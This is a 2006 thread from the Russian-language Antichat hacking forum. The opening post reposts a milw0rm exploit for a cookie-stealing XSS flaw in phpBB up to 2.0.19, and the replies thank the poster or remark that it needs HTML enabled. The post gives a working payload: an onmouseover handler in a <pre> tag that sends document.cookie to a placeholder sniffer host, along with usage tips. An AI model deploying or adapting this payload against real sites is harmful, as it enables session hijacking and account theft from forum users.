Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit (https://forum.antichat.xyz/showthread.php?t=13675)

Rebz 30.01.2006 01:05

phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
 
/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

Код:

<pre a='>' onmouseover='document.location="http://адрес_сниффера/сниффер.php?c="+document.cookie' b='<pre' >

[url_]http://www.somesite.com/[/url_]</pre>

* в теге [url_] убираем знак подчеркивания "_".

# milw0rm.com [2006-01-29]

MERTXX 18.02.2006 17:18

thankss....http://www.turkhackerler.com/forum ===>> 2.0.19 :D thank you Rebz..

SanyaX 18.02.2006 20:46

Прикольно а сам нашёл ии где то взял?

m0nzt3r 18.02.2006 21:43

Цитата:

Сообщение от SanyaX
Прикольно а сам нашёл ии где то взял?

Цитата:

# milw0rm.com [2006-01-29]
Цитата:

Сообщение от Antichat.Ru
Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 5 символов.

мда =)

Gang100 28.02.2006 19:45

уязвимость работает только с включеным Html на форуме, а таких форумов единицы =(


Время: 03:28